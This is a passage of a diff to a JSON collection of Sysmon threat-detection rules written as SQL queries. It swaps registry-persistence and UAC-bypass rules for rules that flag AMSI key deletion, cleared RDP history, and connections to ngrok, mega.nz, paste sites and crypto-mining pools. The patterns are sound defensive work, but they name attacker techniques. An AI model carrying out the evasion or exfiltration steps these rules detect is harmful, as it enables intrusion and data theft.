"filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - 
"title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program 
Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use 
IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. 
An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "test", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unknown", + "@subTee in your network" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname 
LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - 
"id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE 
'%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - 
"author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 
'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 
'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 